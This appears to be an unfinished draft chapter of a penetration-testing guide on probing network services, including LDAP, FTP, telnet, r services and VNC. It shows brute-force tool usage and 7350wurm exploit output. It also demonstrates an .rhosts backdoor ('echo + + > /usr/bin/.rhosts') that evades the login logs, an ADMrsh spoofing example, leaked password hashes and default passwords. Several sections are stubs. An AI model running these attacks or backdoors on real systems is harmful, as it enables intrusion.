100005 1 tcp 32776 mountd
100003 2 udp 2049 nfs
100011 1 udp 32822 rquotad
100002 2 udp 32823 rusersd
100002 3 tcp 33180 rusersd
From finding that rusersd is indeed running, we can probe the service with
the rusers client from any Unix-based platform to retrieve a list of users
who are logged into the system:
# rusers -l 192.168.0.50
Sending broadcast for rusersd protocol version 3...
Sending broadcast for rusersd protocol version 2...
jah onyx:console Mar 3 13:03 22:03
amber onyx:ttyp1 Mar 2 07:40
sebree onyx:ttyp5 Mar 2 10:35 14
tut onyx:ttyp6 Mar 2 10:48
LDAP
The Lightweight Directory Access Protocol (LDAP) service is commonly found
on Windows 2000 Active Directory, Exchange and Lotus Domino servers. The
system is used to provide user directory information to clients. LDAP is
highly extensible and widely supported by Apache, MS Exchange, Outlook,
Netscape Communicator and others.
LDAP can be queried anonymously (mileage depending on the server
configuration) using the ldp.exe utility from the Microsoft Windows 2000
Support Tools Kit (found on the Windows 2000 Server installation CD under
the /support/tools/ directory). Figure 32 below shows ldp.exe being run
against a Windows 2000 server running Lotus Domino.
Figure 32: Enumerating information anonymously via LDAP
[pic]
A very simple Unix-based alternative to ldp.exe is the ldapsearch tool that
is bundled with OpenLDAP (www.openldap.org), shown performing the same
anonymous LDAP search against 192.168.0.65 (a Lotus Domino server on
Windows 2000):
# ldapsearch -h 192.168.0.65
< non-relevant results removed for aesthetic purposes >
# Nick Baskett, Trustmatta
dn: CN=Nick Baskett,O=Trustmatta
mail: nick.baskett@trustmatta.com
givenname: Nick
sn: Baskett
cn: Nick Baskett, nick
uid: nick
maildomain: trustmatta
# Andrew Done, Trustmatta/2C andrew
dn: CN=Andrew Done,O=Trustmatta/, andrew
mail: andrew.done@trustmatta.com
givenname: Andrew
sn: Done
uid: andrew
maildomain: trustmatta
# James Woodcock, Trustmatta/2C james
dn: CN=James Woodcock,O=Trustmatta/, james
mail: james.woodcock@trustmatta.com
givenname: James
sn: Woodcock
uid: james
maildomain: trustmatta
# Jim Chalmers, Trustmatta/2C jim
dn: CN=Jim Chalmers,O=Trustmatta/, jim
mail: jim.chalmers@trustmatta.com
givenname: Jim
sn: Chalmers
uid: Jim
maildomain: trustmatta
Anonymous access to LDAP has limited use, however if LDAP is found running
under Windows 2000 it can be attacked by brute force with a list of valid
user names (enumerated through NetBIOS, SNMP or other techniques) to find
both users with weak system passwords, and gain access to LDAP itself.
The Unix-based bf_ldap tool can be used to effectively perform an LDAP
brute force attack, available from www.trustmatta.com/tools/bf_ldap.tar.gz.
The usage of bf_ldap is demonstrated in figure 33 as follows.
Figure 33: The bf_ldap LDAP brute force utility
# bf_ldap
Eliel Sardanons <eliel.sardanons@philips.edu.ar>
Usage:
bf_ldap <parameters> <optional>
parameters:
-s server
-d domain name
-u|-U username | users list file name
-L|-l passwords list | length of passwords to generate
optional:
-p port (default 389)
-v (verbose mode)
-P Ldap user path (default ,CN=Users,)
Remote Maintenance Services
Services used by network administrators to directly manage remote hosts
over TCP/IP include Telnet, FTP, SSH, VNC and raft of others. Remote
maintenance services are threatened by three categories of attack in
particular:
Information leak attacks, where user and system details can be gleaned
Process manipulation, including overflow attacks involving malformed data
Brute force guessing of user passwords to gain direct access
For example, an online bank may be running the telnet service on its
Internet routers for administrative purposes. This telnet service may not
be vulnerable to information leak or process manipulation attacks, but a
determined attacker will spend an amount of time undertaking a brute force
attack against the device service in order to gain access. Brute force is
seriously underestimated as an attack vector by many organizations.
Common remote maintenance services taken from the services file are as
follows:
ftp 21/tcp
ssh 22/tcp
telnet 23/tcp
exec 512/tcp
login 513/tcp
shell 514/tcp
controlit 799/tcp
x11 6000/tcp
citrix-ica 1494/tcp
ms-rdp 3389/tcp
pcanywheredata 5631/tcp
pcanywherestat 5632/tcp
vnc-http 5800/tcp
vnc 5900/tcp
pcanywhere 65301/tcp
FTP
File Transfer Protocol services are primarily found running on network
servers for file transfer purposes. The FTP service uses two TCP ports to
function correctly:
TCP port 21 (the FTP control port), used to issue FTP commands
TCP port 20 (the FTP data port), used to transfer data from the server to
clients
When finding a server running FTP, the first piece of information that will
be gleaned from connecting to the service is the FTP server banner:
# ftp 192.168.0.11
Connected to 192.168.0.11 (192.168.0.11).
220 darkside FTP server ready.
Name (192.168.0.11:root):
The banner above is that of a Solaris 9 server. Solaris 8 (SunOS 5.8) and
prior return the operating system detail in a slightly different banner:
# ftp 192.168.0.12
Connected to 192.168.0.12 (192.168.0.12).
220 lackie FTP server (SunOS 5.8) ready.
Name (192.168.0.12:root):
If the banner is obfuscated or modified to remove service version or
operating system information, the service can sometimes be identified by
analyzing responses to quote help and syst commands upon logging in
anonymously, as shown in figure 34 below.
Figure 34: Logging into and querying an FTP service
# ftp 192.168.0.250
Connected to 192.168.0.250 (192.168.0.250).
220 ftp.trustmatta.com FTP server ready.
Name (ftp.trustmatta.com:root): ftp
331 Guest login ok, send your complete e-mail address as
password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote help
214-The following commands are recognized (* =>'s
unimplemented).
USER PORT STOR MSAM* RNTO NLST MKD
CDUP
PASS PASV APPE MRSQ* ABOR SITE XMKD
XCUP
ACCT* TYPE MLFL* MRCP* DELE SYST RMD
STOU
SMNT* STRU MAIL* ALLO CWD STAT XRMD
SIZE
REIN* MODE MSND* REST XCWD HELP PWD
MDTM
QUIT RETR MSOM* RNFR LIST NOOP XPWD
214 Direct comments to ftpadmin@ftp.trustmatta.com
ftp> syst
215 UNIX Type: L8 Version: SUNOS
Common FTP Banner List
Sun Solaris 7:
220 hostname FTP server (SunOS 5.7) ready.
Sun SunOS 4.1.x:
220 hostname FTP server (SunOS 4.1) ready.
FreeBSD 3.x:
220 hostname FTP server (Version 6.00) ready.
FreeBSD 4.x:
220 hostname FTP server (Version 6.00LS) ready.
NetBSD 1.5.x:
220 hostname FTP server (NetBSD-ftpd 20010329) ready.
OpenBSD:
220 hostname FTP server (Version 6.5/OpenBSD) ready.
SGI IRIX 6.x
220 hostname FTP server ready.
IBM AIX 4.x:
220 hostname FTP server (Version 4.1 Tue Sep 8 17:35:59 CDT
1998) ready.
Compaq Tru64:
220 hostname FTP server (Digital UNIX Version 5.60) ready.
HP-UX 11.x:
220 hostname FTP server (Version 1.1.214.6 Wed Feb 9 08:03:34
GMT 2000) ready.
DEC Ultrix 4.1:
220 hostname FTP server (Version 4.1 Sun Mar 25 22:59:11 EST
1990) ready.
Apple MacOS:
220 hostname FTP server (Version 6.00) ready.
Washington University FTP (WU-FTP) 2.4.2 BETA 18:
220 hostname FTP server (Version wu-2.4.2-academ[BETA-18](1)
Mon Jan 15 15:02:27 JST 1999) ready.
Washington University FTP (WU-FTP) 2.5.0:
220 hostname FTP server (Version wu-2.5.0(1) Tue Jun 15
12:43:57 MST 1999) ready.
ProFTPD 1.2.4
220 ProFTPD 1.2.4 Server (hostname) [hostname]
WU-FTP and ProFTPD are often found running on Linux hosts, although
sometimes administrators chose to run these third party FTP services on
FreeBSD, Solaris and other Unix-based platforms.
Solaris FTP Vulnerabilities
The following glob() bug is present in out-the-box Solaris installations up
to Solaris 8. By issuing requests of CWD ~username, we can effectively
enumerate valid user accounts without even logging into the FTP server
(described in detail at www.iss.net/security_center/static/6332.php). In
this example, blah and test users do not exist, but chris does:
# telnet 192.168.0.12 21
Trying 192.168.0.12...
Connected to 192.168.0.12.
Escape character is '^]'.
220 lackie FTP server (SunOS 5.8) ready.
CWD ~blah
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~test
530 Please login with USER and PASS.
550 Unknown user name after ~
CWD ~chris
530 Please login with USER and PASS.
QUIT
221 Goodbye.
Connection closed by foreign host.
This glob() bug can be exploited within Solaris, resulting in a heap
overflow. Local users can easily abuse this bug so that the Solaris FTP
service dumps a core file containing encrypted user passwords from the
/etc/shadow file, and other sensitive information (vulnerable in Solaris 8
and below):
$ telnet localhost 21
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 cookiemonster FTP server (SunOS 5.6) ready.
user chris
331 Password required for chris.
pass blahblah
530 Login incorrect.
CWD ~
530 Please login with USER and PASS.
Connection closed by foreign host.
$ ls -la /core
-rw-r--r-- 1 root root 284304 Apr 16 10:20 /core
$ strings /core | grep ::
daemon:NP:6445::::::
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
listen:*LK*:::::::
nobody:NP:6445::::::
noaccess:NP:6445::::::
nobody4:NP:6445::::::
chris:XEC/9QJZ4nSn2:12040::::::
sshd:*LK*:::::::
$
A public exploit has not yet been released to remotely compromise Solaris
hosts with this vulnerability. Theoretically, the service could be
exploited under Solaris if write access to the file system is permitted
through FTP (although this may be difficult to exploit under Solaris due to
NULL pointer issues). The glob() vulnerability has been publicly exploited
under BSD systems (including NetBSD, OpenBSD, FreeBSD), which discussed in
the following section.
BSD FTP Vulnerabilities
for which an exploit script is available from
www.phreak.org/archives/exploits/unix/ftpd-exploits/turkey2.c.
FTP server 6.00
FTP server 6.00LS
WU-FTPD Vulnerabilities
WU-FTPD 2.4.2 BETA 18
WU-FTPD version 2.4.2 BETA 18 and prior are vulnerable to a stack overflow
due to insufficient bounds checking in the realpath() function within the
FTP service. Exploitation occurs through an attacker creating a complex
directory structure and then navigating through the structure and executing
arbitrary commands through a stack overflow.
A Unix exploit script for use against Red Hat and Slackware Linux
distributions running WU-FTPD 2.4.2 BETA 18 is archived at
www.trustmatta.com/tools/w00f.c. The CVE reference for this vulnerability
is CVE-1999-0368, and the ISS X-Force has compiled background vulnerability
information at www.iss.net/security_center/static/1728.php.
WU-FTPD 2.5.0
WU-FTPD version 2.5.0 and prior is vulnerable to remote a MAPPING_CHDIR
stack overflow, through a user with write access to the FTP server creating
a series of directories on the host, and using CWD to overflow the
mapped_path variable.
An exploit for use against Red Hat and Debian Linux distributions is
ifafoffuffoffaf by TESO, available in source form from
www.trustmatta.com/tools/ifafoffuffoffaf.c. The CVE reference for this
vulnerability is CVE-1999-0878, and the ISS X-Force has compiled background
vulnerability information at www.iss.net/security_center/static/3158.php.
WU-FTPD 2.6.0
WU-FTPD version 2.6.0 and prior is vulnerable to an lreply() and SITE EXEC
format string attack. In order for the attack to be executed, the user must
be successfully logged in either anonymously or with a valid account.
Many versions of the remote exploit can be found for FreeBSD, Red Hat and
SuSe Linux (one exploit in particular is archived at
www.trustmatta.com/tools/wuftp-god.c). The CVE reference for the
vulnerability is CVE-2000-0573, and the ISS X-Force has compiled a good
list of links and background information accessible at
www.iss.net/security_center/static/4773.php.
WU-FTPD 2.6.1
WU-FTPD version 2.6.1 and prior is vulnerable a glob() heap corruption
attack through issuing a series of RNFR and CWD ~{ commands to the FTP
service. In order for such commands to be successfully issued, the user
must be logged in either anonymously, or with a legitimate user account.
TESO released an exploit script called 7350wurm that is capable of
exploiting this vulnerability on most Linux distributions (Red Hat,
Debian, Mandrake, SuSe, Immunix and Caldera in particular), and is archived
at www.trustmatta.com/tools/7350wurm.c. The CVE reference for the
vulnerability is CVE-2001-550, and the ISS X-Force has compiled a good page
of background information about the vulnerability at
www.iss.net/security_center/static/7611.php.
Exploiting WU-FTPD on Linux with 7350wurm
One excellent trick that 7350wurm has up its sleeve is the capability to
effectively exploit the following WU-FTPD servers found running on Linux
hosts out-of-the-box:
# 7350wurm
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version
0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
usage: ./7350wurm [-h] [-v] [-a] [-D] [-m]
[-t <num>] [-u <user>] [-p <pass>] [-d host]
[-L <retloc>] [-A <retaddr>]
-h this help
-v be verbose (default: off, twice for greater effect)
-a AUTO mode (target from banner)
-D DEBUG mode (waits for keypresses)
-m enable mass mode (use with care)
-t num choose target (0 for list, try -v or -v -v)
-u user username to login to FTP (default: "ftp")
-p pass password to use (default: "mozilla@")
-d dest IP address or fqhn to connect to (default: 127.0.0.1)
-L loc override target-supplied retloc (format: 0xdeadbeef)
-A addr override target-supplied retaddr (format: 0xcafebabe)
# 7350wurm -t0
7350wurm - x86/linux wuftpd <= 2.6.1 remote root (version
0.2.2)
team teso (thx bnuts, tomas, synnergy.net !).
num . description
----+-------------------------------------------------------
1 | Caldera eDesktop|eServer|OpenLinux 2.3 update [wu-ftpd-
2.6.1-13OL.i386.rpm]
2 | Debian potato [wu-ftpd_2.6.0-3.deb]
3 | Debian potato [wu-ftpd_2.6.0-5.1.deb]
4 | Debian potato [wu-ftpd_2.6.0-5.3.deb]
5 | Debian sid [wu-ftpd_2.6.1-5_i386.deb]
6 | Immunix 6.2 (Cartman) [wu-ftpd-2.6.0-3_StackGuard.rpm]
7 | Immunix 7.0 (Stolichnaya) [wu-ftpd-2.6.1-6_imnx_2.rpm]
8 | Mandrake 6.0|6.1|7.0|7.1 update [wu-ftpd-2.6.1-
8.6mdk.i586.rpm]
9 | Mandrake 7.2 update [wu-ftpd-2.6.1-8.3mdk.i586.rpm]
10 | Mandrake 8.1 [wu-ftpd-2.6.1-11mdk.i586.rpm]
11 | RedHat 5.0|5.1 update [wu-ftpd-2.4.2b18-2.1.i386.rpm]
12 | RedHat 5.2 (Apollo) [wu-ftpd-2.4.2b18-2.i386.rpm]
13 | RedHat 5.2 update [wu-ftpd-2.6.0-2.5.x.i386.rpm]
14 | RedHat 6.? [wu-ftpd-2.6.0-1.i386.rpm]
15 | RedHat 6.0|6.1|6.2 update [wu-ftpd-2.6.0-14.6x.i386.rpm]
16 | RedHat 6.1 (Cartman) [wu-ftpd-2.5.0-9.rpm]
17 | RedHat 6.2 (Zoot) [wu-ftpd-2.6.0-3.i386.rpm]
18 | RedHat 7.0 (Guinness) [wu-ftpd-2.6.1-6.i386.rpm]
19 | RedHat 7.1 (Seawolf) [wu-ftpd-2.6.1-16.rpm]
20 | RedHat 7.2 (Enigma) [wu-ftpd-2.6.1-18.i386.rpm]
21 | SuSE 6.0|6.1 update [wuftpd-2.6.0-151.i386.rpm]
22 | SuSE 6.0|6.1 update wu-2.4.2 [wuftpd-2.6.0-151.i386.rpm]
23 | SuSE 6.2 update [wu-ftpd-2.6.0-1.i386.rpm]
24 | SuSE 6.2 update [wuftpd-2.6.0-121.i386.rpm]
25 | SuSE 6.2 update wu-2.4.2 [wuftpd-2.6.0-121.i386.rpm]
26 | SuSE 7.0 [wuftpd.rpm]
27 | SuSE 7.0 wu-2.4.2 [wuftpd.rpm]
28 | SuSE 7.1 [wuftpd.rpm]
29 | SuSE 7.1 wu-2.4.2 [wuftpd.rpm]
30 | SuSE 7.2 [wuftpd.rpm]
31 | SuSE 7.2 wu-2.4.2 [wuftpd.rpm]
32 | SuSE 7.3 [wuftpd.rpm]
33 | SuSE 7.3 wu-2.4.2 [wuftpd.rpm]
34 | Slackware 7.1
The tool can be easily run with the -a flag, which allows 7350wurm to grab
the banner of the target FTP server and select the correct target memory
addresses and padding values from its target list.
ProFTPD Vulnerabilities
1.2.4
1.2.5
SSH
The current version of SSH that a target host is running can be ascertained
by simply using telnet to connect to TCP port 22 of the host, as shown
below:
# telnet 192.168.0.80 22
Trying 192.168.0.80...
Connected to 192.168.0.80.
Escape character is '^]'.
SSH-2.0-OpenSSH_3.5p1
In this example the host is running OpenSSH 3.5 patch level 1 using the SSH
2.0 protocol. Hosts found running the old SSH 1.0 protocol are rare on the
Internet at the time of writing, as the SSH 2.0 protocol introduces many
useful security features.
Security conscious administrators will often modify the SSH banner to
present the following information:
# telnet 192.168.0.80 22
Trying 192.168.0.80...
Connected to 192.168.0.80.
Escape character is '^]'.
SSH-2.0-0.0.0
In this second example the SSH service supports the SSH 2.0 protocol, but
the actual type and version of the service itself is unknown (as it is set
to 0.0.0).
To properly interact with SSH and log in, we require an SSH client. SSH
clients can be found under most recent Unix-based platforms, and OpenSSH
(www.openssh.org) is a popular package containing both the SSH server and
client utilities for key pair generation and connection to SSH services.
For Windows users, PuTTY is a freely downloadable tool available with a
host of other SSH client utilities (including PSCP, PSFTP and Plink)
available from http://www.chiark.greenend.org.uk/~sgtatham/putty/.
Commercial SSH Vulnerabilities
OpenSSH Vulnerabilities
Ssh 1 CRC bug
channel_lookup
challenge response / PAM
Telnet
Common Telnet Banner List
Sun Solaris 8:
SunOS 5.8
Sun Solaris 2.6:
SunOS 5.6
Sun Solaris 2.4 and 2.5.1:
UNIX(r) System V Release 4.0 (hostname)
SunOS 4.1.x
SunOS UNIX (hostname)
FreeBSD:
FreeBSD/i386 (hostname) (ttyp1)
NetBSD:
NetBSD/i386 (hostname) (ttyp1)
OpenBSD:
OpenBSD/i386 (hostname) (ttyp1)
Red Hat Linux 8.0
Red Hat Linux release 8.0 (Psyche)
Debian Linux 3.0
Debian GNU/Linux 3.0 / hostname
SGI IRIX 6.x
IRIX (hostname)
IBM AIX 4.1.x:
AIX Version 4
(C) Copyrights by IBM and by others 1982, 1994.
IBM AIX 4.2.x and 4.3.x
AIX Version 4
(C) Copyrights by IBM and by others 1982, 1996.
Nokia IPSO:
IPSO (hostname) (ttyp0)
Cisco IOS:
User Access Verification
Password:
Livingstone ComOS:
ComOS - Livingston PortMaster
Sun Telnet Vulnerabilities
Loginex overflow affecting Solaris 6 - 8
BSD Telnet Vulnerabilities
Bsd overflow
Linux Telnet Vulnerabilities
Netkit telnetd remote
IRIX Telnet Vulnerabilities
Ld_so preload or whatever it was..
AIX Telnet Vulnerabilities
Bsd overflow
Appliance Server, Router & Switch Telnet Vulnerabilities
Ipso user enumeration:
pipex-gw>telnet 192.168.0.254
Trying 192.168.0.254 ... Open
IPSO (checkpointcharlie) (ttyp0)
login: root
Password:
Login incorrect
login: blaaah
Password:
Login incorrect
login: fw1adm
Password:
Password:
Login incorrect
login: fw1adm
Password:
Password:
Login incorrect
Login timed out after 300 seconds
[Connection to 192.168.0.254 closed by foreign host]
pipex-gw>
Cisco default passes, enable, system, cisco, router, admin, Cisco, !cisco
R Services
Unix r services are common to commercial Unix-based platforms in
particular, including Solaris, HP-UX and AIX. These services are listed in
the services file as:
exec 512/tcp
login 513/tcp
shell 514/tcp
Each of these services run using standard PAM username and password
authentication, which is in turn overridden by ~/.rhosts and
/etc/hosts.equiv file entries. Within Unix, the exec service is rexecd, the
login service is rlogind, and the shell service is rshd.
Accessing r services
From a Unix platform, rsh, rlogin and rexec clients are used to access the
respective r services running on a remote host. Figure 31 below shows the
usage for each client when run from the Unix command shell.
Figure 31: Running rsh, rlogin and rexec from the command shell
# rsh
usage: rsh [-nd] [-l login] host [command]
# rlogin
usage: rlogin [ -8EL] [-e char] [ -l username ] host
# rexec
rexec: Require at least a host name and command.
Usage: rexec [ -abcdhns ] -l username -p password host
command
-l username: Sets the login name for the remote host.
-p password: Sets the password for the remote host.
-n: Explicitly prompt for name and password.
-a: Do not set up an auxiliary channel for standard
error.
-b: Use BSD-rsh type signal handling.
-c: Do not close remote standard in when local input
closes
-d: Turn on debugging information.
-h: Print this usage message.
-s: Do not echo signals to the remote process.
Unix ~/.rhosts and /etc/hosts.equiv files
The .rhosts file exists in the user home directory under Unix, containing a
list of username and IP address or machine hostname pairs, such as the
following:
# pwd
/home/chris
# cat .rhosts
chris mail.trustmatta.com
+ 192.168.0.55
#
In this example, I can use any of the r services (rsh, rlogin or rexec) to
connect to this host from mail.trustmatta.com if I am logged into the host
as chris, or from 192.168.0.55 with any username on that host.
When a user connects to the host running rshd (the remote shell daemon
running on TCP port 514), the source IP address is cross-referenced against
the .rhosts file and verified by querying the identd service running at the
source. If these details are found to be valid, then direct access is given
to the host without even requiring a password.
A simple yet effective backdoor for most Unix-based systems running rshd is
to place an .rhosts file in the home directory of the bin user (/usr/bin/
under Solaris) containing the wildcard '+ +' for any user at any host.
Figure 32 below demonstrates this backdoor being planted and used to gain
access to the host:
Figure 32: Planting and accessing a simple .rhosts rshd backdoor
# echo + + > /usr/bin/.rhosts
# exit
hacker@host/$ rsh -l bin 192.168.0.20 csh -i
Warning: no access to tty; thus no job control in this
shell...
www% w
5:45pm up 33 day(s), 15 min(s), 1 user, load average:
0.00, 0.00, 0.01
User tty login@ idle JCPU PCPU what
root console 19Dec0219days -sh
www%
A useful feature with the rshd service is that terminals are not assigned
to processes run through rsh. This means that bin access through our rshd
backdoor does not appear in the utmp or wtmp logs, and is cloaked within
the system (not appearing within w or who listings). Unfortunately, the
network connection into TCP port 514 will appear if a user executes a
netstat -a command, and processes run by the bin user will also appear in
ps -ef listings.
It is very easy to get from bin to root under Unix-based systems, as
the bin user owns many binaries that run as system services (found
under directories including /usr/sbin/) with super-user root
privileges.
The /etc/hosts.equiv file is a system level file used to define trusted
hostnames or IP addresses that can freely access r services. SunOS 4.1.3_U1
shipped with a '+' wildcard in the /etc/hosts.equiv file, allowing for
attackers to gain direct bin level access to SunOS 4.1.3_U1 servers with
TCP port 514 open.
Testing the security of r services
User passwords can be brute forced across rlogind, as the service calls
/bin/login and the standard PAM mechanism. The rshd and rexecd services do
not pass username and password details to the login program in this way,
and merely rely on .rhosts and /etc/hosts.equiv entries for authentication.
It is recommended that for each user enumerated through finger, SMTP and
other information leak vulnerabilities, attempts are made to access the
host directly through open r services in the following fashion:
# rsh -l chris 192.168.0.20 csh -i
permission denied
# rsh -l test 192.168.0.20 csh -i
permission denied
# rsh -l root 192.168.0.20 csh -i
permission denied
# rsh -l bin 192.168.0.20 csh -i
Warning: no access to tty; thus no job control in this
shell...
www%
It will be possible to use rsh to log into a Solaris server as root if the
user's password has not been set. I have seen this only once in a live
environment, during an onsite audit I undertook in a hosting centre
containing Solaris web servers that had been built and configured using
automatic scripts.
Spoofing connections to the rsh service
If you are aware of trust between hosts or have seen .rhosts files on
compromised servers, tools can be used to spoof rsh connections by using IP
sequence prediction and falsified client responses to match entries in
.rhosts files server-side. A good tool used to perform such rsh spoofing is
ADMrsh, available from the ADM website at adm.freelsd.net/ADM/. The utility
requires the latest version of ADMspoof and its header files (found in ADM-
spoof-NEW.tgz at the time of writing), and its usage is shown below:
ADMrsh
**==**
It's very easy to use (like all the ADM products).
ADMrsh [ips] [ipd] [ipl] [luser] [ruser] [cmd]
Parameters List :
ips = ip source (ip of the trusted host)
ipd = ip destination (ip of the victim)
ipl = ip local (your ip to receive the informations)
luser = local user
ruser = remote user
cmd = command to execute
If ya don't understand, this is an example :
ADMrsh a.foo.us b.foo.us ppp.bad.org root root "echo/"+
+/">/.rhosts"
Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet
ADMrsh 0.5 pub (c) ADM <-- hehe ;)
X Windows
Tcp 6000
Microsoft Remote Desktop Protocol
Remote Desktop Protocol (RDP) is used as a terminal service for thin client
access to the Windows desktop across a network. The service can be found
running on TCP port 3389, and the Microsoft terminal services (or Remote
Desktop within Windows XP) client is used to connect to the RDP service, as
shown in figure xx.
Figure xx: Connecting to RDP using the remote desktop client
VNC
AT&T's Virtual Network Computing (VNC) package is available from
www.uk.research.att.com/vnc/. VNC is a free and simple to deploy remote
desktop access system for Windows systems, and can be found running over
the following TCP ports:
Port 5800 for HTTP access to VNC using a Java client through a web
browser
Port 5900 for direct access to VNC using the native vncviewer.exe
From a security perspective VNC is relatively straightforward to
compromise. The main problem with VNC security is in the authentication
phase when a user connects to the service, below is a screenshot from
vncviewer.exe:
[pic]
VNC only requires one piece of data for authentication purposes, a session
password (which has a maximum length of 8 characters). On the target
server, the VNC password string is stored in the Windows registry under the
following keys:
/HKEY_CURRENT_USER/Software/ORL/WinVNC3
/HKEY_USERS/.DEFAULT/Software/ORL/WinVNC3
A fixed key is used to encrypt the VNC password using DES, and so if we can
gain read access to the registry across the network (often accessible on
poorly protected Windows hosts), it is possible to compromise the VNC
session password. The current fixed key can be retrieved from the VNC
source code, available from the AT&T site. At the time of writing the fixed
key found in VNC is 23 82 10 76 35 78 88 7.
VNCrack
VNCrack by FX of Phenoelit is a Unix-based VNC hacking utility available
from www.phenoelit.de/vncrack/. VNCrack is capable of performing the
following attacks against VNC servers:
Cracking of the Windows registry hex values to compromise the session
password
Direct brute force of the VNC session password
The VNC handshake can be sniffed and the session password compromised using
the Unix-based PHoss network sniffing utility, available from Phenoelit at
www.phenoelit.de/phoss/.
PCAnywhere
PCAnywhere listens on ports 22 (TCP and UDP), 5631 (TCP) "pcanywheredata",
and 5632 (TCP and UDP) "pcanywherestat), and 65301 (TCP).
Citrix
Citrix is a scalable thin client Windows service that is accessed directly
through TCP port 1494 and high dynamic ports (above 1024) server-side. The
protocol that Citrix uses is known as ICA (Independent Computing
Architecture), and upon locating a server with TCP port 1494 open, a Citrix
ICA client should be selected and used to connect to the service for
further investigation (available from
www.citrix.com/download/ica_clients.asp).
ControlIT
TCP port 799
Various vulnerabilities found in 1999 by ISS
Microsoft Windows Networking TCP Services
Microsoft Windows networking services involve use of the following TCP
services server-side:
135
139
445
UDP ports 137 and 138 are used primarily within Windows domains and
networks to facilitate name lookup and other functions, which are discussed
in the next chapter.
client / server communication 135
common internet file system 139 & 445
file sharing session 139
login sequence 139
UDP ports 137 and 138 are used for various NetBIOS naming lookup functions,
which are covered in the following Chapter.
The SMB (Server Message Block) protocol is used among other things for file
sharing in Windows NT / 2000. In Windows NT it ran on top of NBT (NetBIOS
over TCP/IP), which used the famous ports 137, 138 (UDP) and 139 (TCP). In
Windows 2000, Microsoft added the possibility to run SMB directly over
TCP/IP, without the extra layer of NBT. For this they use TCP port 445.
Microsoft DCE Locator Service running on port 135
Microsoft DCE Locator service aka. end-point mapper. It works like Sun RPC
portmapper, except that end-points can also be named pipes. Microsoft
relies upon DCE RPC to remotely manage services. Some services that use
port 135 of end-point mapping include DNS, WINS, Exchange and the Messenger
Service.
Enumerate system information through the DCE Locator Service
Through the DCE locator service we can primarily enumerate the following:
IP addresses used on other network interfaces
Details of services using dynamic high ports
EPDUMP
Epdump is a Windows command-line utility that can be used to query the DCE
locator service running on TCP port 135 of the target host in the following
manner:
D:/>epdump
binding is nil
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:192.168.0.1[1028]
annot 'Messenger Service'
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:62.30.68.4[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 1ff70682-0a51-30e8-076d-740be8cee98b v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[LRPC00000284.00000001]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:62.30.68.4[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.170.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.189.1[1025]
annot ''
int 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_ip_tcp:192.168.0.1[1025]
annot ''
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[ntsvcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_np:OSG-SERV[//PIPE//nt
svcs]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncacn_np:OSG-SERV[//PIPE//sc
erpc]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncalrpc:[DNSResolver]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:62.30.68.4[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:192.168.170.1[1028]
annot 'Messenger Service'
int 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0
binding 00000000-0000-0000-0000-
000000000000@ncadg_ip_udp:192.168.189.1[1028]
annot 'Messenger Service'
no more entries
D:/>
DCETEST
Dave Aitel wrote a simple yet effective Unix version of the epdump utility,
called dcetest. The dcetest tool is run in a similar fashion, with similar
results:
Brute force of user passwords through the DCE Locator Service
WMIcracker.exe uses TCP 135 to access the WMI and brute force passwords of
users in the administrators group
Remotely running arbitrary code or crashing the DCE Locator Service
Two particular vulnerabilities were disclosed in late 2002 regarding the
DCE locator service and flaws within the program that can lead to arbitrary
code being run or the service crashing. The bug is present in Windows NT
4.0 through to XP.
In particular, two articles are of interest:
http://www.mail-archive.com/bugtraq@securityfocus.com/msg09495.html
http://www.microsoft.com/technet/security/bulletin/MS03-001.asp
Microsoft NetBIOS Session Service running on port 139
NetBIOS Session (TCP), Windows File and Printer Sharing
